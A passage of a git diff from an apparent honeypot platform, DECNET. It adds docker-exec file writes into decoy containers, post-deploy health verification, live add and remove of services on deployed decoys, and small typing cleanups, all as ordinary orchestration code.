LookupError — when ``topology_id`` is set but the topology or + its named decky doesn't exist. Callers translate this into + 404/422 at the API layer. + """ + if topology_id is None: + return f"{decky_name}{_SSH_CONTAINER_SUFFIX}" + + from decnet.topology.persistence import hydrate + hydrated = await hydrate(repo, topology_id) + if hydrated is None: + raise LookupError(f"topology {topology_id!r} not found") + for decky in hydrated["deckies"]: + cfg = decky.get("decky_config") or {} + name = cfg.get("name") or decky.get("name") + if name == decky_name: + services = decky.get("services") or [] + return resolve_topology_container(topology_id, decky_name, services) + raise LookupError( + f"decky {decky_name!r} is not in topology {topology_id!r}" + ) diff --git a/decnet/decky_io/write.py b/decnet/decky_io/write.py new file mode 100644 index 00000000..ff89e828 --- /dev/null +++ b/decnet/decky_io/write.py @@ -0,0 +1,124 @@ +"""``docker exec``-driven file write/delete inside a decky container. + +The write path streams a base64-encoded payload over stdin to +``base64 -d`` inside the container, so binary content of any size up +to docker's stream limits is safe — interpolating bytes into argv +would trip ARG_MAX (~128 KB on most kernels) for any non-trivial blob. +""" +from __future__ import annotations + +import asyncio +import base64 +import shlex +from datetime import datetime, timezone +from typing import Optional + +from decnet.logging import get_logger + +log = get_logger("decky_io.write") + +_DOCKER = "docker" +_DEFAULT_TIMEOUT = 8.0 + + +def _dirname(path: str) -> str: + idx = path.rfind("/") + if idx <= 0: + return "/" + return path[:idx] + + +async def _run( + argv: list[str], + *, + stdin_bytes: Optional[bytes] = None, + timeout: float = _DEFAULT_TIMEOUT, +) -> tuple[int, str, str]: + try: + proc = await asyncio.create_subprocess_exec( + *argv, + stdin=asyncio.subprocess.PIPE if stdin_bytes is not None else None, + stdout=asyncio.subprocess.PIPE, + stderr=asyncio.subprocess.PIPE, + ) + except FileNotFoundError as exc: + return 127, "", f"argv[0] not found: {exc}" + try: + stdout, stderr = await asyncio.wait_for( + proc.communicate(input=stdin_bytes), timeout=timeout, + ) + except asyncio.TimeoutError: + try: + proc.kill() + except ProcessLookupError: + pass + return 124, "", "timeout" + return ( + proc.returncode if proc.returncode is not None else -1, + stdout.decode("utf-8", "replace"), + stderr.decode("utf-8", "replace"), + ) + + +async def write_file_to_container( + container: str, + path: str, + content: bytes, + *, + mode: int = 0o644, + mtime: Optional[datetime] = None, + timeout: float = _DEFAULT_TIMEOUT, +) -> tuple[bool, Optional[str]]: + """Write *content* to *path* inside *container* via ``docker exec``. + + The directory above *path* is created if missing; *mode* is applied + after the write; when *mtime* is provided the file is backdated via + ``touch -d`` (UTC ISO 8601). + + Returns ``(success, error_or_none)``. ``error`` is the trimmed + docker stderr on rc != 0, or a short "rc=" if stderr was empty. + """ + if not path: + return False, "empty path" + + encoded = base64.b64encode(content) + parts = [ + f"mkdir -p {shlex.quote(_dirname(path))}", + f"base64 -d > {shlex.quote(path)}", + f"chmod {mode:o} {shlex.quote(path)}", + ] + if mtime is not None: + ts = mtime.astimezone(timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC") + parts.append(f"touch -d {shlex.quote(ts)} {shlex.quote(path)}") + sh_cmd = " && ".join(parts) + argv = [_DOCKER, "exec", "-i", container, "sh", "-c", sh_cmd] + rc, _stdout, stderr = await _run(argv, stdin_bytes=encoded, timeout=timeout) + success = rc == 0 + if success: + return True, None + err = stderr.strip()[:256] or f"rc={rc}" + log.warning( + "decky_io.write failed container=%s path=%s rc=%d stderr=%r", + container, path, rc, stderr[:120], + ) + return False, err + + +async def delete_file_from_container( + container: str, + path: str, + *, + timeout: float = _DEFAULT_TIMEOUT, +) -> tuple[bool, Optional[str]]: + """Best-effort ``rm -f`` of *path* inside *container*. + + Returns ``(success, error_or_none)``. ``rm -f`` returns rc=0 even + when the file is already gone, so a True result here means "the + file is not present after this call", regardless of who unlinked it. + """ + sh_cmd = f"rm -f {shlex.quote(path)}" + argv = [_DOCKER, "exec", container, "sh", "-c", sh_cmd] + rc, _stdout, stderr = await _run(argv, timeout=timeout) + if rc == 0: + return True, None + return False, stderr.strip()[:256] or f"rc={rc}" diff --git a/decnet/engine/deployer.py b/decnet/engine/deployer.py index 141e0293..276d2f06 100644 --- a/decnet/engine/deployer.py +++ b/decnet/engine/deployer.py @@ -3,6 +3,7 @@ Deploy, teardown, and status via Docker SDK + subprocess docker compose. """ import asyncio +import json import shutil import subprocess # nosec B404 import time @@ -163,6 +164,48 @@ def _sync_sessrec_sources(config: DecnetConfig) -> None: shutil.copy2(src, dest) +def _compose_ps(compose_file: Path) -> list[dict[str, object]]: + """Return ``docker compose ps`` rows for *compose_file* as parsed JSON. + + Used for post-deploy verification: ``compose up -d`` returns 0 the + moment containers are *started*, but a service that crashes on boot + (port collision, bad image, missing dependency) only shows up here. + Returns an empty list when compose has nothing to report (and on + parse failure — caller treats that as 'unverifiable, don't gate'). + """ + cmd = [ + "docker", "compose", "-p", "decnet", "-f", str(compose_file), + "ps", "--all", "--format", "json", + ] + try: + result = subprocess.run( # nosec B603 + cmd, capture_output=True, text=True, check=False, + ) + except FileNotFoundError: + return [] + if result.returncode != 0: + return [] + rows: list[dict[str, object]] = [] + # ``docker compose ps --format json`` emits one JSON object per line + # (newline-delimited), not a JSON array. Parse line-by-line so a + # single bad line doesn't poison the whole result. + for line in (result.stdout or "").splitlines(): + line = line.strip() + if not line: + continue + try: + obj = json.loads(line) + except json.JSONDecodeError: + continue + if isinstance(obj, dict): + rows.append(obj) + elif isinstance(obj, list): + for item in obj: + if isinstance(item, dict): + rows.append(item) + return rows + + def _compose(*args: str, compose_file: Path = COMPOSE_FILE, env: dict | None = None) -> None: import os # -p decnet pins the compose project name. Without it, docker compose @@ -953,8 +996,84 @@ async def deploy_topology(repo, topology_id: str, *, dry_run: bool = False) -> N ) raise - await transition_status(repo, topology_id, TopologyStatus.ACTIVE) - log.info("topology %s deployed n_lans=%d", topology_id, len(lans)) + # Post-deploy verification: ``compose up -d`` returns 0 the moment + # containers are *started*, so a service that crashes on boot + # (port bind failure, bad image, missing dependency) leaves the + # topology row sitting at ACTIVE while half the substrate is dead. + # Sample compose ps once and downgrade to DEGRADED if any expected + # container isn't running — operators see real state instead of an + # optimistic flag. + ps_rows = await anyio.to_thread.run_sync( + lambda: _compose_ps(compose_path), + ) + bad: list[str] = [] + # Build the per-decky state map. The base container's compose + # service name == decky name, which is what we cache on the + # TopologyDecky row. Service containers (named ``-``) + # don't gate the decky's state — service-level failures are visible + # in compose ps separately and don't downgrade the decky as a whole. + decky_state_by_name: dict[str, str] = {} + for row in ps_rows: + state = str(row.get("State", "")).lower() + service_name = str(row.get("Service") or "") + if service_name and "-" not in service_name: + # Plain decky base; cache its docker state. + decky_state_by_name[service_name] = state or "unknown" + if state and state != "running": + name = str(row.get("Name") or row.get("Service") or "?") + exit_code = row.get("ExitCode") + bad.append( + f"{name}={state}" + + (f" (exit={exit_code})" if exit_code not in (None, 0, "") else "") + ) + + # Reconcile each TopologyDecky.state from compose's view. Without + # this, the row stays at the default 'pending' forever and the + # dashboard's ACTIVE DECKIES count reads 0/N even when everything's + # actually up. + for decky in hydrated["deckies"]: + cfg = decky.get("decky_config") or {} + decky_name = cfg.get("name") or decky.get("name") + if not decky_name: + continue + ds = decky_state_by_name.get(decky_name, "unknown") + new_state = "running" if ds == "running" else "failed" + try: + await repo.update_topology_decky( + decky["uuid"], {"state": new_state}, + ) + except Exception as exc: # noqa: BLE001 + log.warning( + "post-deploy state reconcile failed topology=%s decky=%s: %s", + topology_id, decky_name, exc, + ) + + if bad: + reason = "post-deploy check: " + ", ".join(bad[:8]) + ( + f" and {len(bad) - 8} more" if len(bad) > 8 else "" + ) + await transition_status( + repo, topology_id, TopologyStatus.DEGRADED, reason=reason, + ) + log.warning( + "topology %s deployed but %d container(s) unhealthy: %s", + topology_id, len(bad), reason, + ) + else: + await transition_status(repo, topology_id, TopologyStatus.ACTIVE) + log.info("topology %s deployed n_lans=%d", topology_id, len(lans)) + + # Best-effort canary baseline seed across every decky in the + # topology. Same resilience contract as the fleet path: failures + # surface as state=failed token rows, never abort the deploy. + try: + from decnet.canary import planter as _canary_planter + await _canary_planter.seed_baseline_topology(repo, topology_id) + except Exception as exc: # noqa: BLE001 + log.warning( + "canary baseline seed failed (best-effort) topology=%s err=%s", + topology_id, exc, + ) @_traced("engine.teardown_topology") diff --git a/decnet/engine/services_live.py b/decnet/engine/services_live.py new file mode 100644 index 00000000..cb5dc266 --- /dev/null +++ b/decnet/engine/services_live.py @@ -0,0 +1,673 @@ +"""Add/remove a single service on a deployed decky without full redeploy. + +The ``_compose()`` wrapper in :mod:`decnet.engine.deployer` already +supports per-service targeting (``up --no-deps -d ``, +``stop ``, ``rm -f ``). What was missing was the +orchestration: regenerate the compose file (so future redeploys reflect +the change), persist the new ``services`` list, and run the targeted +compose command. + +Two scopes: + +* **Topology** — source of truth is the ``topology_deckies`` table; the + compose file is per-topology (``decnet-topology--compose.yml``). +* **Fleet** — source of truth is ``decnet-state.json`` (with the + ``fleet_deckies`` table mirroring it); compose is the unihost + ``decnet-compose.yml``. + +Both publish ``decky..service.added`` / +``decky..service.removed`` on the bus. The new topic constants +are documented in ``wiki-checkout/Service-Bus.md``. +""" +from __future__ import annotations + +import subprocess # nosec B404 +from pathlib import Path +from typing import Any, Literal, Optional + +import anyio + +from decnet.bus import topics +from decnet.logging import get_logger +from decnet.services.base import BaseService +from decnet.services.registry import get_service +from decnet.topology.persistence import hydrate +from decnet.web.db.repository import BaseRepository + +# Heavy imports (composer/deployer pull in decnet.network → docker) are +# deferred to call-sites via the ``_compose`` / ``_topology_compose_path`` +# / ``_load_state`` indirection helpers below. Mirrors the lazy-import +# pattern in decnet.canary.planter for the same reason. + + +def _compose(*args: str, compose_file: Optional[Path] = None, env=None) -> None: + """Indirection so tests can ``monkeypatch.setattr(services_live, '_compose', ...)``. + + Real implementation lives in :mod:`decnet.engine.deployer`; we + import-and-delegate at call time to keep this module's import graph + clean (see module docstring above). + """ + from decnet.engine.deployer import _compose as _real_compose + if compose_file is None: + _real_compose(*args, env=env) + else: + _real_compose(*args, compose_file=compose_file, env=env) + + +def _topology_compose_path(topology_id: str) -> Path: + from decnet.engine.deployer import _topology_compose_path as _real_path + return _real_path(topology_id) + + +def _write_topology_compose(hydrated, path: Path) -> Path: + from decnet.topology.compose import write_topology_compose + return write_topology_compose(hydrated, path) + + +def _load_state(): + from decnet.config import load_state as _real_load_state + return _real_load_state() + + +def _save_state(config, compose_path) -> None: + from decnet.config import save_state as _real_save_state + _real_save_state(config, compose_path) + + +def _write_compose(config, compose_path) -> None: + from decnet.composer import write_compose as _real_write_compose + _real_write_compose(config, compose_path) + + +def _get_bus(): + from decnet.bus.factory import get_bus + return get_bus() + + +# --------------------------- swarm propagation helpers --------------------------- +# +# Service mutations (add/remove/update_config) on a deployed decky used to run +# the master's local docker-compose only. For swarm fleet deckies the master +# has no containers; for agent-targeted topologies the master only writes a +# compose file the worker never sees. These helpers replay the change to the +# worker so the env actually lands. +# +# Lazy imports keep this module's import graph clean (composer/swarm pull in +# decnet.network → docker, mirroring the pattern used elsewhere in this file). + + +async def _fleet_decky_host_uuid(repo: BaseRepository, decky_name: str) -> Optional[str]: + """Return ``host_uuid`` if a fleet decky lives on a swarm worker, else None.""" + shards = await repo.list_decky_shards() + for s in shards: + if s.get("decky_name") == decky_name: + return s.get("host_uuid") + return None + + +async def _redispatch_fleet_shard(repo: BaseRepository, host_uuid: str) -> None: + """Re-push the host's full shard to its worker agent. + + Uses the same code path as POST /swarm/deploy: load master state, filter + to the host's deckies, hand to AgentClient.deploy via dispatch_decnet_config. + The agent regenerates compose and recreates only the changed containers. + Idempotent for unchanged deckies. + """ + from decnet.web.router.swarm.api_deploy_swarm import dispatch_decnet_config + + state = _load_state() + if state is None: + log.warning("redispatch_fleet_shard: no fleet state on master; skipping") + return + config, _compose_path = state + host_deckies = [d for d in config.deckies if getattr(d, "host_uuid", None) == host_uuid] + if not host_deckies: + log.warning( + "redispatch_fleet_shard: master state has no deckies for host=%s; skipping", + host_uuid, + ) + return + filtered = config.model_copy(update={"deckies": host_deckies}) + await dispatch_decnet_config(filtered, repo) + + +async def _resync_agent_topology(repo: BaseRepository, topology_id: str) -> None: + """If the topology is agent-pinned, push the latest hydrated blob to the worker.""" + from decnet.engine.deployer import resync_agent_topology + + hydrated = await hydrate(repo, topology_id) + if hydrated is None: + return + if not hydrated.get("topology", {}).get("target_host_uuid"): + return # unihost topology — local compose is authoritative + await resync_agent_topology(repo, topology_id) + + +log = get_logger("engine.services_live") + +DeckyKind = Literal["fleet", "topology"] + + +class ServiceMutationError(ValueError): + """Raised for caller-correctable failures. The API layer dispatches on + subclass to produce 4xx codes; base class maps to 422. + """ + + +class ServiceNotFoundError(ServiceMutationError): + """Decky or topology does not exist → 404.""" + + +class ServiceConflictError(ServiceMutationError): + """Idempotency violation (already on / not on) → 409.""" + + +def _validate_service_for_per_decky(name: str) -> BaseService: + """Return the registered service or raise ``ServiceMutationError``. + + ``fleet_singleton`` services run once per fleet (e.g. an LLMNR + responder), not per-decky — we reject the per-decky add/remove + request rather than silently producing a no-op compose entry. + """ + try: + svc = get_service(name) + except KeyError as exc: + raise ServiceMutationError(f"unknown service {name!r}") from exc + if svc.fleet_singleton: + raise ServiceMutationError( + f"service {name!r} is fleet_singleton; not addable per-decky" + ) + return svc + + +async def _publish(topic: str, payload: dict[str, Any]) -> None: + """Best-effort bus publish — same shape as the canary planter's helper.""" + try: + bus = _get_bus() + await bus.connect() + await bus.publish(topic, payload) + await bus.close() + except Exception as e: # noqa: BLE001 + log.warning("services_live bus publish failed topic=%s err=%s", topic, e) + + +# ---------------------------------------------------------- topology path + + +async def _topology_decky( + repo: BaseRepository, topology_id: str, decky_name: str, +) -> dict[str, Any]: + hydrated = await hydrate(repo, topology_id) + if hydrated is None: + raise ServiceNotFoundError(f"topology {topology_id!r} not found") + for d in hydrated["deckies"]: + cfg = d.get("decky_config") or {} + name = cfg.get("name") or d.get("name") + if name == decky_name: + return d + raise ServiceNotFoundError( + f"decky {decky_name!r} is not in topology {topology_id!r}" + ) + + +async def _rerender_topology_compose( + repo: BaseRepository, topology_id: str, +) -> Path: + """Re-hydrate + re-render the per-topology compose file. + + Called after a successful DB update so future deploys reflect the + change; without this the file would still describe the old service + set and a subsequent ``up -d`` would resurrect the removed service. + """ + hydrated = await hydrate(repo, topology_id) + if hydrated is None: # pragma: no cover — narrow race + raise ServiceNotFoundError( + f"topology {topology_id!r} disappeared mid-mutation" + ) + path = _topology_compose_path(topology_id) + _write_topology_compose(hydrated, path) + return path + + +async def _add_topology_service( + repo: BaseRepository, + topology_id: str, + decky_name: str, + service_name: str, + initial_config: dict | None = None, +) -> list[str]: + decky = await _topology_decky(repo, topology_id, decky_name) + services: list[str] = list(decky.get("services") or []) + if service_name in services: + raise ServiceConflictError( + f"service {service_name!r} already on decky {decky_name!r}" + ) + services.append(service_name) + update: dict[str, Any] = {"services": services} + # If the caller supplied initial config, fold it into decky_config + # BEFORE compose regen so the first ``up`` materialises the env on + # the new container — no follow-up apply needed. + if initial_config: + cfg_blob = dict(decky.get("decky_config") or {}) + sc = dict(cfg_blob.get("service_config") or {}) + sc[service_name] = initial_config + cfg_blob["service_config"] = sc + update["decky_config"] = cfg_blob + await repo.update_topology_decky(decky["uuid"], update) + + compose_path = await _rerender_topology_compose(repo, topology_id) + if await _topology_is_agent_pinned(repo, topology_id): + # Agent-pinned: the master's local compose has nothing to up. + # Push the new hydrated blob to the worker. + await _resync_agent_topology(repo, topology_id) + else: + target = f"{decky_name}-{service_name}" + # Run compose in a worker thread so the API event loop stays + # responsive — same pattern as engine/deployer.deploy_topology. + await anyio.to_thread.run_sync( + lambda: _compose( + "up", "-d", "--no-deps", "--build", target, + compose_file=compose_path, + ), + ) + return services + + +async def _topology_is_agent_pinned(repo: BaseRepository, topology_id: str) -> bool: + hydrated = await hydrate(repo, topology_id) + if hydrated is None: + return False + return bool(hydrated.get("topology", {}).get("target_host_uuid")) + + +async def _remove_topology_service( + repo: BaseRepository, + topology_id: str, + decky_name: str, + service_name: str, +) -> list[str]: + decky = await _topology_decky(repo, topology_id, decky_name) + services: list[str] = list(decky.get("services") or []) + if service_name not in services: + raise ServiceConflictError( + f"service {service_name!r} not on decky {decky_name!r}" + ) + services = [s for s in services if s != service_name] + target = f"{decky_name}-{service_name}" + compose_path = _topology_compose_path(topology_id) + agent_pinned = await _topology_is_agent_pinned(repo, topology_id) + if not agent_pinned: + # Stop + rm before persisting + re-rendering so a half-completed + # mutation leaves the operator a clear state to retry from + # (container still running; DB still says service is on). + await anyio.to_thread.run_sync( + lambda: _compose("stop", target, compose_file=compose_path), + ) + await anyio.to_thread.run_sync( + lambda: _compose("rm", "-f", target, compose_file=compose_path), + ) + await repo.update_topology_decky(decky["uuid"], {"services": services}) + await _rerender_topology_compose(repo, topology_id) + if agent_pinned: + # Worker tears down the removed service when it diffs the + # incoming hydrated blob against its current state. + await _resync_agent_topology(repo, topology_id) + return services + + +# ---------------------------------------------------------- fleet path + + +def _fleet_state_or_raise() -> tuple[Any, Path]: + state = _load_state() + if state is None: + raise ServiceMutationError( + "no fleet state on disk — run `decnet up` first" + ) + return state + + +def _fleet_find_decky(config: Any, decky_name: str) -> Any: + for d in config.deckies: + if d.name == decky_name: + return d + raise ServiceNotFoundError(f"fleet decky {decky_name!r} not found") + + +async def _persist_fleet_change( + repo: BaseRepository, decky: Any, services: list[str], compose_path: Path, +) -> None: + """Persist the mutation to JSON state, compose file, and the DB row.""" + config, _ = _load_state() + target = _fleet_find_decky(config, decky.name) + target.services = services + _save_state(config, compose_path) + _write_compose(config, compose_path) + # Mirror to the DB row so DB-only consumers (dashboard, API) see the + # change without waiting for the reconciler. + from decnet.web.db.models import LOCAL_HOST_SENTINEL + await repo.upsert_fleet_decky({ + "host_uuid": getattr(decky, "host_uuid", None) or LOCAL_HOST_SENTINEL, + "name": decky.name, + "services": services, + "decky_config": target.model_dump(mode="json"), + "decky_ip": decky.ip, + "state": "running", + }) + + +async def _add_fleet_service( + repo: BaseRepository, + decky_name: str, + service_name: str, + initial_config: dict | None = None, +) -> list[str]: + config, compose_path = _fleet_state_or_raise() + decky = _fleet_find_decky(config, decky_name) + services: list[str] = list(decky.services or []) + if service_name in services: + raise ServiceConflictError( + f"service {service_name!r} already on decky {decky_name!r}" + ) + services.append(service_name) + if initial_config: + # Same path as _update_fleet_service_config: stash the validated + # cfg on the decky model so the compose write picks it up. + sc = dict(getattr(decky, "service_config", None) or {}) + sc[service_name] = initial_config + decky.service_config = sc + await _persist_fleet_change(repo, decky, services, compose_path) + swarm_host_uuid = await _fleet_decky_host_uuid(repo, decky_name) + if swarm_host_uuid: + # Master has no container for this decky — re-push the host's + # shard so the worker materialises the new service. + await _redispatch_fleet_shard(repo, swarm_host_uuid) + else: + target = f"{decky_name}-{service_name}" + await anyio.to_thread.run_sync( + lambda: _compose( + "up", "-d", "--no-deps", "--build", target, + compose_file=compose_path, + ), + ) + return services + + +async def _remove_fleet_service( + repo: BaseRepository, decky_name: str, service_name: str, +) -> list[str]: + config, compose_path = _fleet_state_or_raise() + decky = _fleet_find_decky(config, decky_name) + services: list[str] = list(decky.services or []) + if service_name not in services: + raise ServiceConflictError( + f"service {service_name!r} not on decky {decky_name!r}" + ) + services = [s for s in services if s != service_name] + target = f"{decky_name}-{service_name}" + swarm_host_uuid = await _fleet_decky_host_uuid(repo, decky_name) + if not swarm_host_uuid: + # Local: stop+rm before persist so the operator has a clear retry + # state if compose fails halfway. Swarm: skip — the worker's compose + # will handle the removal when the redispatched config drops the + # service from the decky. + await anyio.to_thread.run_sync( + lambda: _compose("stop", target, compose_file=compose_path), + ) + await anyio.to_thread.run_sync( + lambda: _compose("rm", "-f", target, compose_file=compose_path), + ) + await _persist_fleet_change(repo, decky, services, compose_path) + if swarm_host_uuid: + await _redispatch_fleet_shard(repo, swarm_host_uuid) + return services + + +# ---------------------------------------------------------- public api + + +async def add_service( + repo: BaseRepository, + *, + decky_kind: DeckyKind, + decky_name: str, + service_name: str, + topology_id: Optional[str] = None, + config: dict | None = None, +) -> list[str]: + """Add *service_name* to a deployed decky. + + Validates the service registry (rejects unknown / fleet_singleton + names) and the optional ``config`` against the service's schema, + persists the change, regenerates the compose file, runs + ``up -d --no-deps --build -`` in a worker thread, + and publishes ``decky..service.added`` on the bus. + + ``config`` is the same dict shape PUT/POST .../config accepts; it's + coerced via ``BaseService.validate_cfg`` before any state write so + a 400-class failure leaves zero side-effects. + + Returns the post-mutation services list. + """ + svc = _validate_service_for_per_decky(service_name) + initial_config = svc.validate_cfg(config) if config else {} + if decky_kind == "topology": + if not topology_id: + raise ServiceMutationError( + "decky_kind=topology requires topology_id", + ) + services = await _add_topology_service( + repo, topology_id, decky_name, service_name, + initial_config=initial_config, + ) + elif decky_kind == "fleet": + services = await _add_fleet_service( + repo, decky_name, service_name, + initial_config=initial_config, + ) + else: # pragma: no cover — Literal narrows + raise ServiceMutationError(f"unknown decky_kind {decky_kind!r}") + + await _publish( + topics.decky(decky_name, topics.DECKY_SERVICE_ADDED), + { + "decky_name": decky_name, + "service_name": service_name, + "topology_id": topology_id, + "services": services, + }, + ) + log.info( + "services_live.add decky=%s topology=%s service=%s", + decky_name, topology_id, service_name, + ) + return services + + +async def update_service_config( + repo: BaseRepository, + *, + decky_kind: DeckyKind, + decky_name: str, + service_name: str, + cfg: dict, + apply: bool = False, + topology_id: Optional[str] = None, +) -> dict: + """Persist ``cfg`` as the new ``service_config[service_name]`` for a decky. + + The submitted dict is validated against the service's + ``config_schema`` (unknown keys dropped, types coerced) BEFORE any + DB write, so a 400-class failure leaves zero side-effects. + + ``apply=False`` (Save): only the DB row + compose file are updated. + The running container keeps its old env. + ``apply=True`` (Apply): same persistence, then a force-recreate of + ``-`` so the container picks + up the new env. Destructive: drops any + in-container session state on that service. + + Returns the post-mutation validated cfg. + """ + svc = _validate_service_for_per_decky(service_name) + validated = svc.validate_cfg(cfg) + if decky_kind == "topology": + if not topology_id: + raise ServiceMutationError( + "decky_kind=topology requires topology_id", + ) + await _update_topology_service_config( + repo, topology_id, decky_name, service_name, validated, apply=apply, + ) + elif decky_kind == "fleet": + await _update_fleet_service_config( + repo, decky_name, service_name, validated, apply=apply, + ) + else: # pragma: no cover + raise ServiceMutationError(f"unknown decky_kind {decky_kind!r}") + + await _publish( + topics.decky(decky_name, topics.DECKY_SERVICE_CONFIG_CHANGED), + { + "decky_name": decky_name, + "service_name": service_name, + "topology_id": topology_id, + "service_config": validated, + "recreated": bool(apply), + }, + ) + log.info( + "services_live.update_config decky=%s topology=%s service=%s apply=%s", + decky_name, topology_id, service_name, apply, + ) + return validated + + +async def _update_topology_service_config( + repo: BaseRepository, + topology_id: str, + decky_name: str, + service_name: str, + validated: dict, + *, + apply: bool, +) -> None: + decky = await _topology_decky(repo, topology_id, decky_name) + if service_name not in (decky.get("services") or []): + raise ServiceConflictError( + f"service {service_name!r} not on decky {decky_name!r}" + ) + cfg_blob = dict(decky.get("decky_config") or {}) + sc = dict(cfg_blob.get("service_config") or {}) + sc[service_name] = validated + cfg_blob["service_config"] = sc + await repo.update_topology_decky(decky["uuid"], {"decky_config": cfg_blob}) + compose_path = await _rerender_topology_compose(repo, topology_id) + if apply: + if await _topology_is_agent_pinned(repo, topology_id): + await _resync_agent_topology(repo, topology_id) + else: + target = f"{decky_name}-{service_name}" + await anyio.to_thread.run_sync( + lambda: _compose( + "up", "-d", "--no-deps", "--force-recreate", "--build", target, + compose_file=compose_path, + ), + ) + + +async def _update_fleet_service_config( + repo: BaseRepository, + decky_name: str, + service_name: str, + validated: dict, + *, + apply: bool, +) -> None: + config, compose_path = _fleet_state_or_raise() + decky = _fleet_find_decky(config, decky_name) + if service_name not in (decky.services or []): + raise ServiceConflictError( + f"service {service_name!r} not on decky {decky_name!r}" + ) + sc = dict(getattr(decky, "service_config", None) or {}) + sc[service_name] = validated + decky.service_config = sc + _save_state(config, compose_path) + _write_compose(config, compose_path) + from decnet.web.db.models import LOCAL_HOST_SENTINEL + await repo.upsert_fleet_decky({ + "host_uuid": getattr(decky, "host_uuid", None) or LOCAL_HOST_SENTINEL, + "name": decky.name, + "services": list(decky.services or []), + "decky_config": decky.model_dump(mode="json"), + "decky_ip": decky.ip, + "state": "running", + }) + if apply: + swarm_host_uuid = await _fleet_decky_host_uuid(repo, decky_name) + if swarm_host_uuid: + await _redispatch_fleet_shard(repo, swarm_host_uuid) + else: + target = f"{decky_name}-{service_name}" + # Docker Compose tracks the previous container by ID. If that + # container was already removed (or renamed during a prior failed + # deploy), --force-recreate fails with "No such container". Pre- + # remove by name so Compose starts from a clean slate. + await anyio.to_thread.run_sync( + lambda: subprocess.run( # nosec B603 B607 + ["docker", "rm", "-f", target], + capture_output=True, + ), + ) + await anyio.to_thread.run_sync( + lambda: _compose( + "up", "-d", "--no-deps", "--force-recreate", "--build", target, + compose_file=compose_path, + ), + ) + + +async def remove_service( + repo: BaseRepository, + *, + decky_kind: DeckyKind, + decky_name: str, + service_name: str, + topology_id: Optional[str] = None, +) -> list[str]: + """Remove *service_name* from a deployed decky. + + Stops + removes the service container, persists the new services + list, re-renders the compose file (so the next ``up -d`` doesn't + bring it back), and publishes ``decky..service.removed``. + + Returns the post-mutation services list. + """ + if decky_kind == "topology": + if not topology_id: + raise ServiceMutationError( + "decky_kind=topology requires topology_id", + ) + services = await _remove_topology_service( + repo, topology_id, decky_name, service_name, + ) + elif decky_kind == "fleet": + services = await _remove_fleet_service(repo, decky_name, service_name) + else: # pragma: no cover + raise ServiceMutationError(f"unknown decky_kind {decky_kind!r}") + + await _publish( + topics.decky(decky_name, topics.DECKY_SERVICE_REMOVED), + { + "decky_name": decky_name, + "service_name": service_name, + "topology_id": topology_id, + "services": services, + }, + ) + log.info( + "services_live.remove decky=%s topology=%s service=%s", + decky_name, topology_id, service_name, + ) + return services diff --git a/decnet/env.py b/decnet/env.py index 99b6d285..74718586 100644 --- a/decnet/env.py +++ b/decnet/env.py @@ -114,6 +114,11 @@ DECNET_SWARM_MASTER_HOST: str | None = os.environ.get("DECNET_SWARM_MASTER_HOST" DECNET_HOST_UUID: str | None = os.environ.get("DECNET_HOST_UUID") DECNET_MASTER_HOST: str | None = os.environ.get("DECNET_MASTER_HOST") DECNET_SWARMCTL_PORT: int = _port("DECNET_SWARMCTL_PORT", 8770) +# Bind address for the master-side swarm controller. Loopback by default — +# operators flip to 0.0.0.0 (or a specific NIC) on production masters where +# workers heartbeat in over mTLS from other hosts. Seeded by [swarm] +# swarmctl-host in /etc/decnet/decnet.ini. +DECNET_SWARMCTL_HOST: str = os.environ.get("DECNET_SWARMCTL_HOST", "127.0.0.1") # Ingester batching: how many log rows to accumulate per commit, and the # max wait (ms) before flushing a partial batch. Larger batches reduce diff --git a/decnet/geoip/rir/provider.py b/decnet/geoip/rir/provider.py index 87ee53d4..462d78de 100644 --- a/decnet/geoip/rir/provider.py +++ b/decnet/geoip/rir/provider.py @@ -9,7 +9,7 @@ from decnet.geoip.base import Provider from decnet.geoip.lookup import Lookup from decnet.geoip.paths import ensure_root from decnet.geoip.rir.fetch import RIR_SOURCES, fetch_all -from decnet.geoip.rir.parse import parse_file +from decnet.geoip.rir.parse import Range, parse_file logger = logging.getLogger("decnet.geoip.rir.provider") @@ -45,7 +45,7 @@ class RirProvider(Provider): except Exception as exc: logger.warning("geoip.rir: cache load failed, rebuilding: %s", exc) - ranges = [] + ranges: list[Range] = [] for path in self.data_paths(): if not path.exists(): continue diff --git a/decnet/logging/__init__.py b/decnet/logging/__init__.py index 73f61021..3bfbd300 100644 --- a/decnet/logging/__init__.py +++ b/decnet/logging/__init__.py @@ -28,7 +28,7 @@ class _ComponentFilter(logging.Filter): self.component = component def filter(self, record: logging.LogRecord) -> bool: - record.decnet_component = self.component # type: ignore[attr-defined] + record.decnet_component = self.component return True @@ -49,14 +49,14 @@ class _TraceContextFilter(logging.Filter): span = trace.get_current_span() ctx = span.get_span_context() if ctx and ctx.trace_id: - record.otel_trace_id = format(ctx.trace_id, "032x") # type: ignore[attr-defined] - record.otel_span_id = format(ctx.span_id, "016x") # type: ignore[attr-defined] + record.otel_trace_id = format(ctx.trace_id, "032x") + record.otel_span_id = format(ctx.span_id, "016x") else: - record.otel_trace_id = "0" # type: ignore[attr-defined] - record.otel_span_id = "0" # type: ignore[attr-defined] + record.otel_trace_id = "0" + record.otel_span_id = "0" except Exception: - record.otel_trace_id = "0" # type: ignore[attr-defined] - record.otel_span_id = "0" # type: ignore[attr-defined] + record.otel_trace_id = "0" + record.otel_span_id = "0" return True diff --git a/decnet/mutator/engine.py b/decnet/mutator/engine.py index 2e533897..d0de3951 100644 --- a/decnet/mutator/engine.py +++ b/decnet/mutator/engine.py @@ -289,13 +289,13 @@ async def reconcile_agent_resyncs(repo: BaseRepository) -> int: return 0 drained = 0 for topo in pending: - tid = topo["id"] + tid = topo.id try: await _deployer.resync_agent_topology(repo, tid) await repo.set_topology_resync(tid, False) drained += 1 log.info("topology %s resynced to agent %s", - tid, topo.get("target_host_uuid")) + tid, topo.target_host_uuid) except Exception as exc: # noqa: BLE001 log.warning( "topology %s resync failed (will retry): %s", tid, exc, diff --git a/decnet/mutator/ops.py b/decnet/mutator/ops.py index 245bc94a..2ec8f18a 100644 --- a/decnet/mutator/ops.py +++ b/decnet/mutator/ops.py @@ -98,6 +98,463 @@ def _decky_by_name(hydrated: dict[str, Any], name: str) -> Optional[dict]: ) +async def _materialise_lan_change( + repo: Any, + topology_id: str, + *, + created: Optional[tuple[str, str, bool]] = None, + removed: Optional[str] = None, +) -> None: + """Create or remove the docker bridge for a live LAN op + re-render compose. + + Called from ``apply_add_lan`` / ``apply_remove_lan`` after the DB + write lands. Skips when: + + * 